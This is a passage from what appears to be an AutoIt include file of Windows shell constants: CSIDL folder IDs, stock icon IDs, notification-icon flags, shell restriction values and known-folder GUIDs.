$CSIDL_COMMON_VIDEO = 55 GLOBAL CONST $CSIDL_COMPUTERSNEARME = 61 GLOBAL CONST $CSIDL_CONNECTIONS = 49 GLOBAL CONST $CSIDL_CONTROLS = 3 GLOBAL CONST $CSIDL_COOKIES = 33 GLOBAL CONST $CSIDL_DESKTOP = 0 GLOBAL CONST $CSIDL_DESKTOPDIRECTORY = 16 GLOBAL CONST $CSIDL_DRIVES = 17 GLOBAL CONST $CSIDL_FAVORITES = 6 GLOBAL CONST $CSIDL_FONTS = 20 GLOBAL CONST $CSIDL_INTERNET_CACHE = 32 GLOBAL CONST $CSIDL_HISTORY = 34 GLOBAL CONST $CSIDL_LOCAL_APPDATA = 28 GLOBAL CONST $CSIDL_MYMUSIC = 13 GLOBAL CONST $CSIDL_MYPICTURES = 39 GLOBAL CONST $CSIDL_MYVIDEO = 14 GLOBAL CONST $CSIDL_NETHOOD = 19 GLOBAL CONST $CSIDL_PERSONAL = 5 GLOBAL CONST $CSIDL_PRINTERS = 4 GLOBAL CONST $CSIDL_PRINTHOOD = 27 GLOBAL CONST $CSIDL_PROFILE = 40 GLOBAL CONST $CSIDL_PROGRAM_FILES = 38 GLOBAL CONST $CSIDL_PROGRAM_FILES_COMMON = 43 GLOBAL CONST $CSIDL_PROGRAM_FILES_COMMONX86 = 44 GLOBAL CONST $CSIDL_PROGRAM_FILESX86 = 42 GLOBAL CONST $CSIDL_PROGRAMS = 2 GLOBAL CONST $CSIDL_RECENT = 8 GLOBAL CONST $CSIDL_SENDTO = 9 GLOBAL CONST $CSIDL_STARTMENU = 11 GLOBAL CONST $CSIDL_STARTUP = 7 GLOBAL CONST $CSIDL_SYSTEM = 37 GLOBAL CONST $CSIDL_SYSTEMX86 = 41 GLOBAL CONST $CSIDL_TEMPLATES = 21 GLOBAL CONST $CSIDL_WINDOWS = 36 GLOBAL CONST $SIID_DOCNOASSOC = 0 GLOBAL CONST $SIID_DOCASSOC = 1 GLOBAL CONST $SIID_APPLICATION = 2 GLOBAL CONST $SIID_FOLDER = 3 GLOBAL CONST $SIID_FOLDEROPEN = 4 GLOBAL CONST $SIID_DRIVE525 = 5 GLOBAL CONST $SIID_DRIVE35 = 6 GLOBAL CONST $SIID_DRIVEREMOVE = 7 GLOBAL CONST $SIID_DRIVEFIXED = 8 GLOBAL CONST $SIID_DRIVENET = 9 GLOBAL CONST $SIID_DRIVENETDISABLED = 10 GLOBAL CONST $SIID_DRIVECD = 11 GLOBAL CONST $SIID_DRIVERAM = 12 GLOBAL CONST $SIID_WORLD = 13 GLOBAL CONST $SIID_SERVER = 15 GLOBAL CONST $SIID_PRINTER = 16 GLOBAL CONST $SIID_MYNETWORK = 17 GLOBAL CONST $SIID_FIND = 22 GLOBAL CONST $SIID_HELP = 23 GLOBAL CONST $SIID_SHARE = 28 GLOBAL CONST $SIID_LINK = 29 GLOBAL CONST $SIID_SLOWFILE = 30 GLOBAL CONST $SIID_RECYCLER = 31 GLOBAL CONST $SIID_RECYCLERFULL = 32 GLOBAL CONST $SIID_MEDIACDAUDIO = 40 GLOBAL CONST $SIID_LOCK = 47 GLOBAL CONST $SIID_AUTOLIST = 49 GLOBAL CONST $SIID_PRINTERNET = 50 GLOBAL CONST $SIID_SERVERSHARE = 51 GLOBAL CONST $SIID_PRINTERFAX = 52 GLOBAL CONST $SIID_PRINTERFAXNET = 53 GLOBAL CONST $SIID_PRINTERFILE = 54 GLOBAL CONST $SIID_STACK = 55 GLOBAL CONST $SIID_MEDIASVCD = 56 GLOBAL CONST $SIID_STUFFEDFOLDER = 57 GLOBAL CONST $SIID_DRIVEUNKNOWN = 58 GLOBAL CONST $SIID_DRIVEDVD = 59 GLOBAL CONST $SIID_MEDIADVD = 60 GLOBAL CONST $SIID_MEDIADVDRAM = 61 GLOBAL CONST $SIID_MEDIADVDRW = 62 GLOBAL CONST $SIID_MEDIADVDR = 63 GLOBAL CONST $SIID_MEDIADVDROM = 64 GLOBAL CONST $SIID_MEDIACDAUDIOPLUS = 65 GLOBAL CONST $SIID_MEDIACDRW = 66 GLOBAL CONST $SIID_MEDIACDR = 67 GLOBAL CONST $SIID_MEDIACDBURN = 68 GLOBAL CONST $SIID_MEDIABLANKCD = 69 GLOBAL CONST $SIID_MEDIACDROM = 70 GLOBAL CONST $SIID_AUDIOFILES = 71 GLOBAL CONST $SIID_IMAGEFILES = 72 GLOBAL CONST $SIID_VIDEOFILES = 73 GLOBAL CONST $SIID_MIXEDFILES = 74 GLOBAL CONST $SIID_FOLDERBACK = 75 GLOBAL CONST $SIID_FOLDERFRONT = 76 GLOBAL CONST $SIID_SHIELD = 77 GLOBAL CONST $SIID_WARNING = 78 GLOBAL CONST $SIID_INFO = 79 GLOBAL CONST $SIID_ERROR = 80 GLOBAL CONST $SIID_KEY = 81 GLOBAL CONST $SIID_SOFTWARE = 82 GLOBAL CONST $SIID_RENAME = 83 GLOBAL CONST $SIID_DELETE = 84 GLOBAL CONST $SIID_MEDIAAUDIODVD = 85 GLOBAL CONST $SIID_MEDIAMOVIEDVD = 86 GLOBAL CONST $SIID_MEDIAENHANCEDCD = 87 GLOBAL CONST $SIID_MEDIAENHANCEDDVD = 88 GLOBAL CONST $SIID_MEDIAHDDVD = 89 GLOBAL CONST $SIID_MEDIABLURAY = 90 GLOBAL CONST $SIID_MEDIAVCD = 91 GLOBAL CONST $SIID_MEDIADVDPLUSR = 92 GLOBAL CONST $SIID_MEDIADVDPLUSRW = 93 GLOBAL CONST $SIID_DESKTOPPC = 94 GLOBAL CONST $SIID_MOBILEPC = 95 GLOBAL CONST $SIID_USERS = 96 GLOBAL CONST $SIID_MEDIASMARTMEDIA = 97 GLOBAL CONST $SIID_MEDIACOMPACTFLASH = 98 GLOBAL CONST $SIID_DEVICECELLPHONE = 99 GLOBAL CONST $SIID_DEVICECAMERA = 100 GLOBAL CONST $SIID_DEVICEVIDEOCAMERA = 101 GLOBAL CONST $SIID_DEVICEAUDIOPLAYER = 102 GLOBAL CONST $SIID_NETWORKCONNECT = 103 GLOBAL CONST $SIID_INTERNET = 104 GLOBAL CONST $SIID_ZIPFILE = 105 GLOBAL CONST $SIID_SETTINGS = 106 GLOBAL CONST $SIID_DRIVEHDDVD = 132 GLOBAL CONST $SIID_DRIVEBD = 133 GLOBAL CONST $SIID_MEDIAHDDVDROM = 134 GLOBAL CONST $SIID_MEDIAHDDVDR = 135 GLOBAL CONST $SIID_MEDIAHDDVDRAM = 136 GLOBAL CONST $SIID_MEDIABDROM = 137 GLOBAL CONST $SIID_MEDIABDR = 138 GLOBAL CONST $SIID_MEDIABDRE = 139 GLOBAL CONST $SIID_CLUSTEREDDRIVE = 140 GLOBAL CONST $SIID_MAX_ICONS = 174 GLOBAL CONST $SHGSI_ICONLOCATION = 0 GLOBAL CONST $SHGSI_ICON = $SHGFI_ICON GLOBAL CONST $SHGSI_SYSICONINDEX = $SHGFI_SYSICONINDEX GLOBAL CONST $SHGSI_LINKOVERLAY = $SHGFI_LINKOVERLAY GLOBAL CONST $SHGSI_SELECTED = $SHGFI_SELECTED GLOBAL CONST $SHGSI_LARGEICON = $SHGFI_LARGEICON GLOBAL CONST $SHGSI_SMALLICON = $SHGFI_SMALLICON GLOBAL CONST $SHGSI_SHELLICONSIZE = $SHGFI_SHELLICONSIZE GLOBAL CONST $NIM_ADD = 0 GLOBAL CONST $NIM_MODIFY = 1 GLOBAL CONST $NIM_DELETE = 2 GLOBAL CONST $NIM_SETFOCUS = 3 GLOBAL CONST $NIM_SETVERSION = 4 GLOBAL CONST $NIF_MESSAGE = 1 GLOBAL CONST $NIF_ICON = 2 GLOBAL CONST $NIF_TIP = 4 GLOBAL CONST $NIF_STATE = 8 GLOBAL CONST $NIF_INFO = 16 GLOBAL CONST $NIF_GUID = 32 GLOBAL CONST $NIF_REALTIME = 64 GLOBAL CONST $NIF_SHOWTIP = 128 GLOBAL CONST $NIS_HIDDEN = 1 GLOBAL CONST $NIS_SHAREDICON = 2 GLOBAL CONST $NIIF_NONE = 0 GLOBAL CONST $NIIF_INFO = 1 GLOBAL CONST $NIIF_WARNING = 2 GLOBAL CONST $NIIF_ERROR = 3 GLOBAL CONST $NIIF_USER = 4 GLOBAL CONST $NIIF_NOSOUND = 16 GLOBAL CONST $NIIF_LARGE_ICON = 16 GLOBAL CONST $NIIF_RESPECT_QUIET_TIME = 128 GLOBAL CONST $NIIF_ICON_MASK = 15 GLOBAL CONST $SHOP_PRINTERNAME = 1 GLOBAL CONST $SHOP_FILEPATH = 2 GLOBAL CONST $SHOP_VOLUMEGUID = 4 GLOBAL CONST $OFASI_EDIT = 1 GLOBAL CONST $OFASI_OPENDESKTOP = 2 GLOBAL CONST $QUNS_NOT_PRESENT = 1 GLOBAL CONST $QUNS_BUSY = 2 GLOBAL CONST $QUNS_RUNNING_D3D_FULL_SCREEN = 3 GLOBAL CONST $QUNS_PRESENTATION_MODE = 4 GLOBAL CONST $QUNS_ACCEPTS_NOTIFICATIONS = 5 GLOBAL CONST $QUNS_QUIET_TIME = 6 GLOBAL CONST $REST_NORUN = 1 GLOBAL CONST $REST_NOCLOSE = 2 GLOBAL CONST $REST_NOSAVESET = 3 GLOBAL CONST $REST_NOFILEMENU = 4 GLOBAL CONST $REST_NOSETFOLDERS = 5 GLOBAL CONST $REST_NOSETTASKBAR = 6 GLOBAL CONST $REST_NODESKTOP = 7 GLOBAL CONST $REST_NOFIND = 8 GLOBAL CONST $REST_NODRIVES = 9 GLOBAL CONST $REST_NODRIVEAUTORUN = 10 GLOBAL CONST $REST_NODRIVETYPEAUTORUN = 11 GLOBAL CONST $REST_NONETHOOD = 12 GLOBAL CONST $REST_STARTBANNER = 13 GLOBAL CONST $REST_RESTRICTRUN = 14 GLOBAL CONST $REST_NOPRINTERTABS = 15 GLOBAL CONST $REST_NOPRINTERDELETE = 16 GLOBAL CONST $REST_NOPRINTERADD = 17 GLOBAL CONST $REST_NOSTARTMENUSUBFOLDERS = 18 GLOBAL CONST $REST_MYDOCSONNET = 19 GLOBAL CONST $REST_NOEXITTODOS = 20 GLOBAL CONST $REST_ENFORCESHELLEXTSECURITY = 21 GLOBAL CONST $REST_LINKRESOLVEIGNORELINKINFO = 22 GLOBAL CONST $REST_NOCOMMONGROUPS = 23 GLOBAL CONST $REST_SEPARATEDESKTOPPROCESS = 24 GLOBAL CONST $REST_NOWEB = 25 GLOBAL CONST $REST_NOTRAYCONTEXTMENU = 26 GLOBAL CONST $REST_NOVIEWCONTEXTMENU = 27 GLOBAL CONST $REST_NONETCONNECTDISCONNECT = 28 GLOBAL CONST $REST_STARTMENULOGOFF = 29 GLOBAL CONST $REST_NOSETTINGSASSIST = 30 GLOBAL CONST $REST_NOINTERNETICON = 31 GLOBAL CONST $REST_NORECENTDOCSHISTORY = 32 GLOBAL CONST $REST_NORECENTDOCSMENU = 33 GLOBAL CONST $REST_NOACTIVEDESKTOP = 34 GLOBAL CONST $REST_NOACTIVEDESKTOPCHANGES = 35 GLOBAL CONST $REST_NOFAVORITESMENU = 36 GLOBAL CONST $REST_CLEARRECENTDOCSONEXIT = 37 GLOBAL CONST $REST_CLASSICSHELL = 38 GLOBAL CONST $REST_NOCUSTOMIZEWEBVIEW = 39 GLOBAL CONST $REST_NOHTMLWALLPAPER = 40 GLOBAL CONST $REST_NOCHANGINGWALLPAPER = 41 GLOBAL CONST $REST_NODESKCOMP = 42 GLOBAL CONST $REST_NOADDDESKCOMP = 43 GLOBAL CONST $REST_NODELDESKCOMP = 44 GLOBAL CONST $REST_NOCLOSEDESKCOMP = 45 GLOBAL CONST $REST_NOCLOSE_DRAGDROPBAND = 46 GLOBAL CONST $REST_NOMOVINGBAND = 47 GLOBAL CONST $REST_NOEDITDESKCOMP = 48 GLOBAL CONST $REST_NORESOLVESEARCH = 49 GLOBAL CONST $REST_NORESOLVETRACK = 50 GLOBAL CONST $REST_FORCECOPYACLWITHFILE = 51 GLOBAL CONST $REST_NOLOGO3CHANNELNOTIFY = 52 GLOBAL CONST $REST_NOFORGETSOFTWAREUPDATE = 53 GLOBAL CONST $REST_NOSETACTIVEDESKTOP = 54 GLOBAL CONST $REST_NOUPDATEWINDOWS = 55 GLOBAL CONST $REST_NOCHANGESTARMENU = 56 GLOBAL CONST $REST_NOFOLDEROPTIONS = 57 GLOBAL CONST $REST_HASFINDCOMPUTERS = 58 GLOBAL CONST $REST_INTELLIMENUS = 59 GLOBAL CONST $REST_RUNDLGMEMCHECKBOX = 60 GLOBAL CONST $REST_ARP_SHOWPOSTSETUP = 61 GLOBAL CONST $REST_NOCSC = 62 GLOBAL CONST $REST_NOCONTROLPANEL = 63 GLOBAL CONST $REST_ENUMWORKGROUP = 64 GLOBAL CONST $REST_ARP_NOARP = 65 GLOBAL CONST $REST_ARP_NOREMOVEPAGE = 66 GLOBAL CONST $REST_ARP_NOADDPAGE = 67 GLOBAL CONST $REST_ARP_NOWINSETUPPAGE = 68 GLOBAL CONST $REST_GREYMSIADS = 69 GLOBAL CONST $REST_NOCHANGEMAPPEDDRIVELABEL = 70 GLOBAL CONST $REST_NOCHANGEMAPPEDDRIVECOMMENT = 71 GLOBAL CONST $REST_MAXRECENTDOCS = 72 GLOBAL CONST $REST_NONETWORKCONNECTIONS = 73 GLOBAL CONST $REST_FORCESTARTMENULOGOFF = 74 GLOBAL CONST $REST_NOWEBVIEW = 75 GLOBAL CONST $REST_NOCUSTOMIZETHISFOLDER = 76 GLOBAL CONST $REST_NOENCRYPTION = 77 GLOBAL CONST $REST_DONTSHOWSUPERHIDDEN = 78 GLOBAL CONST $REST_NOSHELLSEARCHBUTTON = 79 GLOBAL CONST $REST_NOHARDWARETAB = 80 GLOBAL CONST $REST_NORUNASINSTALLPROMPT = 81 GLOBAL CONST $REST_PROMPTRUNASINSTALLNETPATH = 82 GLOBAL CONST $REST_NOMANAGEMYCOMPUTERVERB = 83 GLOBAL CONST $REST_NORECENTDOCSNETHOOD = 84 GLOBAL CONST $REST_DISALLOWRUN = 85 GLOBAL CONST $REST_NOWELCOMESCREEN = 86 GLOBAL CONST $REST_RESTRICTCPL = 87 GLOBAL CONST $REST_DISALLOWCPL = 88 GLOBAL CONST $REST_NOSMBALLOONTIP = 89 GLOBAL CONST $REST_NOSMHELP = 90 GLOBAL CONST $REST_NOWINKEYS = 91 GLOBAL CONST $REST_NOENCRYPTONMOVE = 92 GLOBAL CONST $REST_NOLOCALMACHINERUN = 93 GLOBAL CONST $REST_NOCURRENTUSERRUN = 94 GLOBAL CONST $REST_NOLOCALMACHINERUNONCE = 95 GLOBAL CONST $REST_NOCURRENTUSERRUNONCE = 96 GLOBAL CONST $REST_FORCEACTIVEDESKTOPON = 97 GLOBAL CONST $REST_NOCOMPUTERSNEARME = 98 GLOBAL CONST $REST_NOVIEWONDRIVE = 99 GLOBAL CONST $REST_NONETCRAWL = 100 GLOBAL CONST $REST_NOSHAREDDOCUMENTS = 101 GLOBAL CONST $REST_NOSMMYDOCS = 102 GLOBAL CONST $REST_NOSMMYPICS = 103 GLOBAL CONST $REST_ALLOWBITBUCKDRIVES = 104 GLOBAL CONST $REST_NONLEGACYSHELLMODE = 105 GLOBAL CONST $REST_NOCONTROLPANELBARRICADE = 106 GLOBAL CONST $REST_NOSTARTPAGE = 107 GLOBAL CONST $REST_NOAUTOTRAYNOTIFY = 108 GLOBAL CONST $REST_NOTASKGROUPING = 109 GLOBAL CONST $REST_NOCDBURNING = 110 GLOBAL CONST $REST_MYCOMPNOPROP = 111 GLOBAL CONST $REST_MYDOCSNOPROP = 112 GLOBAL CONST $REST_NOSTARTPANEL = 113 GLOBAL CONST $REST_NODISPLAYAPPEARANCEPAGE = 114 GLOBAL CONST $REST_NOTHEMESTAB = 115 GLOBAL CONST $REST_NOVISUALSTYLECHOICE = 116 GLOBAL CONST $REST_NOSIZECHOICE = 117 GLOBAL CONST $REST_NOCOLORCHOICE = 118 GLOBAL CONST $REST_SETVISUALSTYLE = 119 GLOBAL CONST $REST_STARTRUNNOHOMEPATH = 120 GLOBAL CONST $REST_NOUSERNAMEINSTARTPANEL = 121 GLOBAL CONST $REST_NOMYCOMPUTERICON = 122 GLOBAL CONST $REST_NOSMNETWORKPLACES = 123 GLOBAL CONST $REST_NOSMPINNEDLIST = 124 GLOBAL CONST $REST_NOSMMYMUSIC = 125 GLOBAL CONST $REST_NOSMEJECTPC = 126 GLOBAL CONST $REST_NOSMMOREPROGRAMS = 127 GLOBAL CONST $REST_NOSMMFUPROGRAMS = 128 GLOBAL CONST $REST_NOTRAYITEMSDISPLAY = 129 GLOBAL CONST $REST_NOTOOLBARSONTASKBAR = 130 GLOBAL CONST $REST_NOSMCONFIGUREPROGRAMS = 131 GLOBAL CONST $REST_HIDECLOCK = 132 GLOBAL CONST $REST_NOLOWDISKSPACECHECKS = 133 GLOBAL CONST $REST_NOENTIRENETWORK = 134 GLOBAL CONST $REST_NODESKTOPCLEANUP = 135 GLOBAL CONST $REST_BITBUCKNUKEONDELETE = 136 GLOBAL CONST $REST_BITBUCKCONFIRMDELETE = 137 GLOBAL CONST $REST_BITBUCKNOPROP = 138 GLOBAL CONST $REST_NODISPBACKGROUND = 139 GLOBAL CONST $REST_NODISPSCREENSAVEPG = 140 GLOBAL CONST $REST_NODISPSETTINGSPG = 141 GLOBAL CONST $REST_NODISPSCREENSAVEPREVIEW = 142 GLOBAL CONST $REST_NODISPLAYCPL = 143 GLOBAL CONST $REST_HIDERUNASVERB = 144 GLOBAL CONST $REST_NOTHUMBNAILCACHE = 145 GLOBAL CONST $REST_NOSTRCMPLOGICAL = 146 GLOBAL CONST $REST_NOPUBLISHWIZARD = 147 GLOBAL CONST $REST_NOONLINEPRINTSWIZARD = 148 GLOBAL CONST $REST_NOWEBSERVICES = 149 GLOBAL CONST $REST_ALLOWUNHASHEDWEBVIEW = 150 GLOBAL CONST $REST_ALLOWLEGACYWEBVIEW = 151 GLOBAL CONST $REST_REVERTWEBVIEWSECURITY = 152 GLOBAL CONST $REST_INHERITCONSOLEHANDLES = 153 GLOBAL CONST $REST_SORTMAXITEMCOUNT = 154 GLOBAL CONST $REST_NOREMOTERECURSIVEEVENTS = 155 GLOBAL CONST $REST_NOREMOTECHANGENOTIFY = 156 GLOBAL CONST $REST_NOSIMPLENETIDLIST = 157 GLOBAL CONST $REST_NOENUMENTIRENETWORK = 158 GLOBAL CONST $REST_NODETAILSTHUMBNAILONNETWORK = 159 GLOBAL CONST $REST_NOINTERNETOPENWITH = 160 GLOBAL CONST $REST_ALLOWLEGACYLMZBEHAVIOR = 161 GLOBAL CONST $REST_DONTRETRYBADNETNAME = 162 GLOBAL CONST $REST_ALLOWFILECLSIDJUNCTIONS = 163 GLOBAL CONST $REST_NOUPNPINSTALL = 164 GLOBAL CONST $REST_ARP_DONTGROUPPATCHES = 165 GLOBAL CONST $REST_ARP_NOCHOOSEPROGRAMSPAGE = 166 GLOBAL CONST $REST_NODISCONNECT = 167 GLOBAL CONST $REST_NOSECURITY = 168 GLOBAL CONST $REST_NOFILEASSOCIATE = 169 GLOBAL CONST $REST_ALLOWCOMMENTTOGGLE = 170 GLOBAL CONST $REST_USEDESKTOPINICACHE = 171 GLOBAL CONST $GIL_DONTCACHE = 16 GLOBAL CONST $GIL_NOTFILENAME = 8 GLOBAL CONST $GIL_PERCLASS = 4 GLOBAL CONST $GIL_PERINSTANCE = 2 GLOBAL CONST $GIL_SIMULATEDOC = 1 GLOBAL CONST $GIL_SHIELD = 512 GLOBAL CONST $GIL_FORCENOSHIELD = 1024 GLOBAL CONST $FOLDERID_ADDNEWPROGRAMS = "{DE61D971-5EBC-4F02-A3A9-6C82895E5C04}" GLOBAL CONST $FOLDERID_ADMINTOOLS = "{724EF170-A42D-4FEF-9F26-B60E846FBA4F}" GLOBAL CONST $FOLDERID_APPUPDATES = "{A305CE99-F527-492B-8B1A-7E76FA98D6E4}" GLOBAL CONST $FOLDERID_CDBURNING = "{9E52AB10-F80D-49DF-ACB8-4330F5687855}" GLOBAL CONST $FOLDERID_CHANGEREMOVEPROGRAMS = "{DF7266AC-9274-4867-8D55-3BD661DE872D}" GLOBAL CONST $FOLDERID_COMMONADMINTOOLS = "{D0384E7D-BAC3-4797-8F14-CBA229B392B5}" GLOBAL CONST $FOLDERID_COMMONOEMLINKS = "{C1BAE2D0-10DF-4334-BEDD-7AA20B227A9D}" GLOBAL CONST $FOLDERID_COMMONPROGRAMS = "{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}" GLOBAL CONST $FOLDERID_COMMONSTARTMENU = "{A4115719-D62E-491D-AA7C-E74B8BE3B067}" GLOBAL CONST $FOLDERID_COMMONSTARTUP = "{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}" GLOBAL CONST $FOLDERID_COMMONTEMPLATES = "{B94237E7-57AC-4347-9151-B08C6C32D1F7}" GLOBAL CONST $FOLDERID_COMPUTERFOLDER = "{0AC0837C-BBF8-452A-850D-79D08E667CA7}" GLOBAL CONST $FOLDERID_CONFLICTFOLDER = "{4BFEFB45-347D-4006-A5BE-AC0CB0567192}" GLOBAL CONST $FOLDERID_CONNECTIONSFOLDER = "{6F0CD92B-2E97-45D1-88FF-B0D186B8DEDD}" GLOBAL CONST $FOLDERID_CONTACTS = "{56784854-C6CB-462B-8169-88E350ACB882}" GLOBAL CONST $FOLDERID_CONTROLPANELFOLDER = "{82A74AEB-AEB4-465C-A014-D097EE346D63}" GLOBAL CONST $FOLDERID_COOKIES = "{2B0F765D-C0E9-4171-908E-08A611B84FF6}" GLOBAL CONST $FOLDERID_DESKTOP = "{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" GLOBAL CONST $FOLDERID_DEVICEMETADATASTORE = "{5CE4A5E9-E4EB-479D-B89F-130C02886155}" GLOBAL CONST $FOLDERID_DOCUMENTSLIBRARY = "{7B0DB17D-9CD2-4A93-9733-46CC89022E7C}" GLOBAL CONST $FOLDERID_DOWNLOADS = "{374DE290-123F-4565-9164-39C4925E467B}" GLOBAL CONST $FOLDERID_FAVORITES = "{1777F761-68AD-4D8A-87BD-30B759FA33DD}" GLOBAL CONST $FOLDERID_FONTS = "{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}" GLOBAL CONST $FOLDERID_GAMES = "{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}" GLOBAL CONST $FOLDERID_GAMETASKS = "{054FAE61-4DD8-4787-80B6-090220C4B700}" GLOBAL CONST $FOLDERID_HISTORY = "{D9DC8A3B-B784-432E-A781-5A1130A75963}" GLOBAL CONST $FOLDERID_HOMEGROUP = "{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}" GLOBAL CONST $FOLDERID_IMPLICITAPPSHORTCUTS = "{BCB5256F-79F6-4CEE-B725-DC34E402FD46}" GLOBAL CONST $FOLDERID_INTERNETCACHE = "{352481E8-33BE-4251-BA85-6007CAEDCF9D}" GLOBAL CONST $FOLDERID_INTERNETFOLDER = "{4D9F7874-4E0C-4904-967B-40B0D20C3E4B}" GLOBAL CONST $FOLDERID_LIBRARIES = "{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}" GLOBAL CONST $FOLDERID_LINKS = "{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}" GLOBAL CONST $FOLDERID_LOCALAPPDATA = "{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" GLOBAL CONST $FOLDERID_LOCALAPPDATALOW = "{A520A1A4-1780-4FF6-BD18-167343C5AF16}" GLOBAL CONST $FOLDERID_LOCALIZEDRESOURCESDIR = "{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}" GLOBAL CONST $FOLDERID_MUSIC = "{4BD8D571-6D19-48D3-BE97-422220080E43}" GLOBAL CONST $FOLDERID_MUSICLIBRARY = "{2112AB0A-C86A-4FFE-A368-0DE96E47012E}" GLOBAL CONST $FOLDERID_NETHOOD = "{C5ABBF53-E17F-4121-8900-86626FC2C973}" GLOBAL CONST $FOLDERID_NETWORKFOLDER = "{D20BEEC4-5CA8-4905-AE3B-BF251EA09B53}" GLOBAL CONST $FOLDERID_ORIGINALIMAGES = "{2C36C0AA-5812-4B87-BFD0-4CD0DFB19B39}" GLOBAL CONST $FOLDERID_PHOTOALBUMS = "{69D2CF90-FC33-4FB7-9A0C-EBB0F0FCB43C}" GLOBAL CONST $FOLDERID_PICTURESLIBRARY = "{A990AE9F-A03B-4E80-94BC-9912D7504104}" GLOBAL CONST $FOLDERID_PICTURES = "{33E28130-4E1E-4676-835A-98395C3BC3BB}" GLOBAL CONST $FOLDERID_PLAYLISTS = "{DE92C1C7-837F-4F69-A3BB-86E631204A23}" GLOBAL CONST $FOLDERID_PRINTERSFOLDER = "{76FC4E2D-D6AD-4519-A663-37BD56068185}" GLOBAL CONST $FOLDERID_PRINTHOOD = "{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}" GLOBAL CONST $FOLDERID_PROFILE = "{5E6C858F-0E22-4760-9AFE-EA3317B67173}" GLOBAL CONST $FOLDERID_PROGRAMDATA = "{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}" GLOBAL CONST $FOLDERID_PROGRAMFILES = "{905E63B6-C1BF-494E-B29C-65B732D3D21A}" GLOBAL CONST $FOLDERID_PROGRAMFILESX64 = "{6D809377-6AF0-444B-8957-A3773F02200E}" GLOBAL CONST $FOLDERID_PROGRAMFILESX86 = "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}" GLOBAL CONST $FOLDERID_PROGRAMFILESCOMMON = "{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}" GLOBAL CONST $FOLDERID_PROGRAMFILESCOMMONX64 = "{6365D5A7-0F0D-45E5-87F6-0DA56B6A4F7D}" GLOBAL CONST $FOLDERID_PROGRAMFILESCOMMONX86 = "{DE974D24-D9C6-4D3E-BF91-F4455120B917}" GLOBAL CONST $FOLDERID_PROGRAMS = "{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}" GLOBAL CONST $FOLDERID_PUBLIC = "{DFDF76A2-C82A-4D63-906A-5644AC457385}" GLOBAL CONST $FOLDERID_PUBLICDESKTOP = "{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}" GLOBAL CONST $FOLDERID_PUBLICDOCUMENTS = "{ED4824AF-DCE4-45A8-81E2-FC7965083634}" GLOBAL CONST $FOLDERID_PUBLICDOWNLOADS = "{3D644C9B-1FB8-4F30-9B45-F670235F79C0}" GLOBAL CONST $FOLDERID_PUBLICGAMETASKS = "{DEBF2536-E1A8-4C59-B6A2-414586476AEA}" GLOBAL CONST $FOLDERID_PUBLICLIBRARIES = "{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}" GLOBAL CONST $FOLDERID_PUBLICMUSIC = "{3214FAB5-9757-4298-BB61-92A9DEAA44FF}" GLOBAL CONST $FOLDERID_PUBLICPICTURES = "{B6EBFB86-6907-413C-9AF7-4FC2ABF07CC5}" GLOBAL CONST $FOLDERID_PUBLICRINGTONES = "{E555AB60-153B-4D17-9F04-A5FE99FC15EC}" GLOBAL CONST $FOLDERID_PUBLICVIDEOS = "{2400183A-6185-49FB-A2D8-4A392A602BA3}" GLOBAL CONST $FOLDERID_QUICKLAUNCH = "{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}" GLOBAL CONST $FOLDERID_RECENT = "{AE50C081-EBD2-438A-8655-8A092E34987A}" GLOBAL CONST $FOLDERID_RECORDEDTVLIBRARY = "{1A6FDBA2-F42D-4358-A798-B74D745926C5}" GLOBAL CONST $FOLDERID_RECYCLEBINFOLDER = "{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}" GLOBAL CONST $FOLDERID_RESOURCEDIR = "{8AD10C31-2ADB-4296-A8F7-E4701232C972}" GLOBAL CONST $FOLDERID_RINGTONES = "{C870044B-F49E-4126-A9C3-B52A1FF411E8}" GLOBAL CONST $FOLDERID_ROAMINGAPPDATA = "{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}" GLOBAL CONST $FOLDERID_SAMPLEMUSIC = "{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}" GLOBAL CONST $FOLDERID_SAMPLEPICTURES = "{C4900540-2379-4C75-844B-64E6FAF8716B}" GLOBAL CONST $FOLDERID_SAMPLEPLAYLISTS = "{15CA69B3-30EE-49C1-ACE1-6B5EC372AFB5}" GLOBAL CONST $FOLDERID_SAMPLEVIDEOS = "{859EAD94-2E85-48AD-A71A-0969CB56A6CD}" GLOBAL CONST $FOLDERID_SAVEDGAMES = "{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}" GLOBAL CONST $FOLDERID_SAVEDSEARCHES = "{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}" GLOBAL CONST $FOLDERID_SEARCH_CSC = "{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}" GLOBAL CONST $FOLDERID_SEARCH_MAPI = "{98EC0E18-2098-4D44-8644-66979315A281}" GLOBAL CONST $FOLDERID_SEARCHHOME = "{190337D1-B8CA-4121-A639-6D472D16972A}" GLOBAL CONST $FOLDERID_SENDTO = "{8983036C-27C0-404B-8F08-102D10DCFD74}" GLOBAL CONST $FOLDERID_SIDEBARDEFAULTPARTS = "{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}" GLOBAL CONST $FOLDERID_SIDEBARPARTS = "{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}" GLOBAL CONST $FOLDERID_STARTMENU = "{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}" GLOBAL CONST $FOLDERID_STARTUP = "{B97D20BB-F46A-4C97-BA10-5E3608430854}" GLOBAL CONST $FOLDERID_SYNCMANAGERFOLDER = "{43668BF8-C14E-49B2-97C9-747784D784B7}" GLOBAL CONST 